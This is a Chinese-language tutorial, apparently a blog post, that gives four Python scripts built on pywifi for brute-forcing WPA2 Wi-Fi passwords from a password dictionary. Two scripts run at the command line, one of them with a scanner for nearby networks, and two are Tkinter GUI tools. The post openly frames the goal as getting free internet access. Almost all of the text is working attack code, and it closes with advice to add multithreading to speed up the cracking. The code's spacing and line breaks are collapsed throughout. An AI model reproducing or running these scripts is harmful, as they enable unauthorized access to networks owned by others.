友情提醒:请注意,如果有人以各种理由向您收取费用,可能存在骗子的风险,请保持警惕,不要轻易支付。本文将介绍一种通过脚本实现WiFi密码暴力破解的方法,以便免费上网。我们首先来看一下没有图形用户界面的爆破脚本。
importpywifi frompywifi importconst importtime importdatetime # 测试连接,返回链接结果defwifiConnect(pwd):# 抓取网卡接口wifi = pywifi.PyWiFi() # 获取第一个无线网卡ifaces = wifi.interfaces()[0] # 断开所有连接ifaces.disconnect() time.sleep(1) wifistatus = ifaces.status() ifwifistatus == const.IFACE_DISCONNECTED: # 创建WiFi连接文件profile = pywifi.Profile() # 要连接WiFi的名称profile.ssid = "Tr0e"# 网卡的开放状态profile.auth = const.AUTH_ALG_OPEN # wifi加密算法,一般wifi加密算法为wpsprofile.akm.append(const.AKM_TYPE_WPA2PSK) # 加密单元profile.cipher = const.CIPHER_TYPE_CCMP # 调用密码profile.key = pwd # 删除所有连接过的wifi文件ifaces.remove_all_network_profiles() # 设定新的连接文件tep_profile = ifaces.add_network_profile(profile) ifaces.connect(tep_profile) # wifi连接时间time.sleep(2) ififaces.status() == const.IFACE_CONNECTED: returnTrueelse: returnFalseelse: print("已有wifi连接") # 读取密码本defreadPassword():success = Falseprint("****************** WIFI破解 ******************") # 密码本路径path = "pwd.txt"# 打开文件file = open(path, "r") start = datetime.datetime.now() whileTrue: try: pwd = file.readline() # 去除密码的末尾换行符pwd = pwd.strip('n') bool = wifiConnect(pwd) ifbool: print("[*] 密码已破解:", pwd) print("[*] WiFi已自动连接!!!") success = Truebreakelse: # 跳出当前循环,进行下一次循环print("正在破解 SSID 为 %s 的 WIFI密码,当前校验的密码为:%s"%("Tr0e",pwd)) except: continueend = datetime.datetime.now() if(success): print("[*] 本次破解WIFI密码一共用了多长时间:{}".format(end - start)) else: print("[*] 很遗憾未能帮你破解出当前指定WIFI的密码,请更换密码字典后重新尝试!") exit(0) if__name__=="__main__": readPassword()
importpywifi importtime frompywifi importconst # WiFi扫描模块defwifi_scan():# 初始化wifiwifi = pywifi.PyWiFi() # 使用第一个无线网卡interface = wifi.interfaces()[0] # 开始扫描interface.scan() fori inrange(4): time.sleep(1) print('r扫描可用 WiFi 中,请稍后。。。('+ str(3- i), end=')') print('r扫描完成!n'+ '-'* 38) print('r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名')) # 扫描结果,scan_results()返回一个集,存放的是每个wifi对象bss = interface.scan_results() # 存放wifi名的集合wifi_name_set = set() forw inbss: # 解决乱码问题wifi_name_and_signal = (100+ w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) wifi_name_set.add(wifi_name_and_signal) # 存入列表并按信号排序wifi_name_list = list(wifi_name_set) wifi_name_list = sorted(wifi_name_list, key=lambdaa: a[0], reverse=True) num = 0# 格式化输出whilenum < len(wifi_name_list): print('r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1print('-'* 38) # 返回wifi列表returnwifi_name_list # WIFI破解模块defwifi_password_crack(wifi_name):# 字典路径wifi_dic_path = input("请输入本地用于WIFI暴力破解的密码字典(txt格式,每个密码占据1行)的路径:") withopen(wifi_dic_path, 'r') asf: # 遍历密码forpwd inf: # 去除密码的末尾换行符pwd = pwd.strip('n') # 创建wifi对象wifi = pywifi.PyWiFi() # 创建网卡对象,为第一个wifi网卡interface = wifi.interfaces()[0] # 断开所有wifi连接interface.disconnect() # 等待其断开whileinterface.status() == 4: # 当其处于连接状态时,利用循环等待其断开pass# 创建连接文件(对象)profile = pywifi.Profile() # wifi名称profile.ssid = wifi_name # 需要认证profile.auth = const.AUTH_ALG_OPEN # wifi默认加密算法profile.akm.append(const.AKM_TYPE_WPA2PSK) profile.cipher = const.CIPHER_TYPE_CCMP # wifi密码profile.key = pwd # 删除所有wifi连接文件interface.remove_all_network_profiles() # 设置新的wifi连接文件tmp_profile = interface.add_network_profile(profile) # 开始尝试连接interface.connect(tmp_profile) start_time = time.time() whiletime.time() - start_time < 1.5: # 接口状态为4代表连接成功(当尝试时间大于1.5秒之后则为错误密码,经测试测正确密码一般都在1.5秒内连接,若要提高准确性可以设置为2s或以上,相应暴力破解速度就会变慢)ifinterface.status() == 4: print(f'r连接成功!密码为:{pwd}') exit(0) else: print(f'r正在利用密码 {pwd}尝试破解。', end='') # 主函数defmain():# 退出标致exit_flag = 0# 目标编号target_num = -1whilenotexit_flag: try: print('WiFi万能钥匙'.center(35, '-')) # 调用扫描模块,返回一个排序后的wifi列表wifi_list = wifi_scan() # 让用户选择要破解的wifi编号,并对用户输入的编号进行判断和异常处理choose_exit_flag = 0whilenotchoose_exit_flag: try: target_num = int(input('请选择你要尝试破解的wifi:')) # 如果要选择的wifi编号在列表内,继续二次判断,否则重新输入iftarget_num inrange(len(wifi_list)): # 二次确认whilenotchoose_exit_flag: try: choose = str(input(f'你选择要破解的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)')) # 对用户输入进行小写处理,并判断ifchoose.lower() == 'y': choose_exit_flag = 1elifchoose.lower() == 'n': break# 处理用户其它字母输入else: print('只能输入 Y/N 哦o(* ̄︶ ̄*)o') # 处理用户非字母输入exceptValueError: print('只能输入 Y/N 哦o(* ̄︶ ̄*)o') # 退出破解ifchoose_exit_flag == 1: breakelse: print('请重新输入哦(*^▽^*)') exceptValueError: print('只能输入数字哦o(* ̄︶ ̄*)o') # 密码破解,传入用户选择的wifi名称wifi_password_crack(wifi_list[target_num][1]) print('-'* 38) exit_flag = 1exceptException ase: print(e) raisee if__name__ == '__main__': main()
WiFi爆破的代码运行效果如下:
fromtkinter import* frompywifi importconst importpywifi importtime # 主要步骤:# 1、获取第一个无线网卡# 2、断开所有的wifi# 3、读取密码本# 4、设置睡眠时间defwificonnect(str, wifiname):# 窗口无线对象wifi = pywifi.PyWiFi() # 抓取第一个无线网卡ifaces = wifi.interfaces()[0] # 断开所有的wifiifaces.disconnect() time.sleep(1) ififaces.status() == const.IFACE_DISCONNECTED: # 创建wifi连接文件profile = pywifi.Profile() profile.ssid = wifiname # wifi的加密算法profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi的密码profile.key = str # 网卡的开发profile.auth = const.AUTH_ALG_OPEN # 加密单元,这里需要写点加密单元否则无法连接profile.cipher = const.CIPHER_TYPE_CCMP # 删除所有的wifi文件ifaces.remove_all_network_profiles() # 设置新的连接文件tep_profile = ifaces.add_network_profile(profile) # 连接ifaces.connect(tep_profile) time.sleep(3) ififaces.status() == const.IFACE_CONNECTED: returnTrueelse: returnFalsedefreadPwd():# 获取wiif名称wifiname = entry.get().strip() path = r'./pwd.txt'file = open(path, 'r') whileTrue: try: # 读取mystr = file.readline().strip() # 测试连接bool = wificonnect(mystr, wifiname) ifbool: text.insert(END, '密码正确'+ mystr) text.see(END) text.update() file.close() breakelse: text.insert(END, '密码错误'+ mystr) text.see(END) text.update() except: continue# 创建窗口root = Tk() root.title('wifi破解') root.geometry('500x400') # 标签label = Label(root, text='输入要破解的WIFI名称:') # 定位label.grid() # 输入控件entry = Entry(root, font=('微软雅黑', 14)) entry.grid(row=0, column=1) # 列表控件text = Listbox(root, font=('微软雅黑', 14), width=40, height=10) text.grid(row=1, columnspan=2) # 按钮button = Button(root, text='开始破解', width=20, height=2, command=readPwd) button.grid(row=2, columnspan=2) # 显示窗口root.mainloop()
from tkinter import * from tkinter import ttk import pywifi from pywifi import const import time import tkinter.filedialog # 在Gui中打开文件浏览import tkinter.messagebox # 打开tkiner的消息提醒框classMY_GUI():def__init__(self, init_window_name): self.init_window_name = init_window_name # 密码文件路径self.get_value = StringVar() # 设置可变内容# 获取破解wifi账号self.get_wifi_value = StringVar() # 获取wifi密码self.get_wifimm_value = StringVar() # 抓取网卡接口self.wifi = pywifi.PyWiFi() # 抓取第一个无线网卡self.iface = self.wifi.interfaces()[0] # 测试链接断开所有链接self.iface.disconnect() time.sleep(1) # 休眠1秒# 测试网卡是否属于断开状态assert self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE] def__str__(self): # 自动会调用的函数,返回自身的网卡return'(WIFI:%s,%s)'% (self.wifi, self.iface.name()) # 设置窗口defset_init_window(self): self.init_window_name.title("WIFI破解工具") self.init_window_name.geometry('+500+200') labelframe = LabelFrame(width=400, height=200, text="配置") # 框架,以下对象都是对于labelframe中添加的labelframe.grid(column=0, row=0, padx=10, pady=10) self.search = Button(labelframe, text="搜索附近WiFi", command=self.scans_wifi_list).grid(column=0, row=0) self.pojie = Button(labelframe, text="开始破解", command=self.readPassWord).grid(column=1, row=0) self.label = Label(labelframe, text="目录路径:").grid(column=0, row=1) self.path = Entry(labelframe, width=12, textvariable=self.get_value).grid(column=1, row=1) self.file = Button(labelframe, text="添加密码文件目录", command=self.add_mm_file).grid(column=2, row=1) self.wifi_text = Label(labelframe, text="WiFi账号:").grid(column=0, row=2) self.wifi_input = Entry(labelframe, width=12, textvariable=self.get_wifi_value).grid(column=1, row=2) self.wifi_mm_text = Label(labelframe, text="WiFi密码:").grid(column=2, row=2) self.wifi_mm_input = Entry(labelframe, width=10, textvariable=self.get_wifimm_value).grid(column=3, row=2,sticky=W) self.wifi_labelframe = LabelFrame(text="wifi列表") self.wifi_labelframe.grid(column=0, row=3, columnspan=4, sticky=NSEW) # 定义树形结构与滚动条self.wifi_tree = ttk.Treeview(self.wifi_labelframe, show="headings", columns=("a", "b", "c", "d")) self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview) self.wifi_tree.configure(yscrollcommand=self.vbar.set) # 表格的标题self.wifi_tree.column("a", width=50, anchor="center") self.wifi_tree.column("b", width=100, anchor="center") self.wifi_tree.column("c", width=100, anchor="center") self.wifi_tree.column("d", width=100, anchor="center") self.wifi_tree.heading("a", text="WiFiID") self.wifi_tree.heading("b", text="SSID") self.wifi_tree.heading("c", text="BSSID") self.wifi_tree.heading("d", text="signal") self.wifi_tree.grid(row=4, column=0, sticky=NSEW) self.wifi_tree.bind("", self.onDBClick) self.vbar.grid(row=4, column=1, sticky=NS) # 搜索wifidefscans_wifi_list(self): # 扫描周围wifi列表# 开始扫描print("^_^ 开始扫描附近wifi...") self.iface.scan() time.sleep(15) # 在若干秒后获取扫描结果scanres = self.iface.scan_results() # 统计附近被发现的热点数量nums = len(scanres) print("数量: %s"% (nums)) # 实际数据self.show_scans_wifi_list(scanres) returnscanres # 显示wifi列表defshow_scans_wifi_list(self, scans_res): forindex, wifi_info inenumerate(scans_res): self.wifi_tree.insert("", 'end', values=(index + 1, wifi_info.ssid, wifi_info.bssid, wifi_info.signal)) # 添加密码文件目录defadd_mm_file(self): self.filename = tkinter.filedialog.askopenfilename() self.get_value.set(self.filename) # Treeview绑定事件defonDBClick(self, event): self.sels = event.widget.selection() self.get_wifi_value.set(self.wifi_tree.item(self.sels, "values")[1]) # 读取密码字典,进行匹配defreadPassWord(self): self.getFilePath = self.get_value.get() self.get_wifissid = self.get_wifi_value.get() pwdfilehander = open(self.getFilePath, "r", errors="ignore") whileTrue:try:self.pwdStr = pwdfilehander.readline() ifnotself.pwdStr:breakself.bool1 = self.connect(self.pwdStr, self.get_wifissid) ifself.bool1:self.res = "[*] 密码正确!wifi名:%s,匹配密码:%s "% (self.get_wifissid, self.pwdStr) self.get_wifimm_value.set(self.pwdStr) tkinter.messagebox.showinfo('提示', '破解成功!!!') print(self.res) breakelse:self.res = "[*] 密码错误!wifi名:%s,匹配密码:%s"% (self.get_wifissid, self.pwdStr) print(self.res) time.sleep(3) except:continue # 对wifi和密码进行匹配defconnect(self, pwd_Str, wifi_ssid): # 创建wifi链接文件self.profile = pywifi.Profile() self.profile.ssid = wifi_ssid # wifi名称self.profile.auth = const.AUTH_ALG_OPEN # 网卡的开放self.profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi加密算法self.profile.cipher = const.CIPHER_TYPE_CCMP # 加密单元self.profile.key = pwd_Str # 密码self.iface.remove_all_network_profiles() # 删除所有的wifi文件self.tmp_profile = self.iface.add_network_profile(self.profile) # 设定新的链接文件self.iface.connect(self.tmp_profile) # 链接time.sleep(5) ifself.iface.status() == const.IFACE_CONNECTED:# 判断是否连接上isOK = True else:isOK = False self.iface.disconnect() # 断开time.sleep(1) # 检查断开状态assert self.iface.status() in [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE] returnisOK defgui_start(): init_window = Tk() ui = MY_GUI(init_window) print(ui) ui.set_init_window() init_window.mainloop() if__name__== "__main__": gui_start()
上述脚本需要手动嵌入WiFi名称和爆破字典路径,缺乏灵活性。为了改进这一点,我们进行了以下优化:
运行脚本的效果如下:
基于上述GUI图形界面开发库,实际上可以使用PyQt5自动生成UI代码来进行GUI编程。有关相关教程,请参考:PyQt5 GUI设计中配置pyqt5(一)。
综上所述,本文学习了一种暴力破解WiFi密码的方法,以及GUI图形编程的基本使用。需要注意的是,演示代码的缺点在于它没有使用多线程进行WiFi连接测试。事实上,由于WiFi连接测试需要一定的时间(3-5秒),使用多线程可以减少暴力破解过程中的等待时间。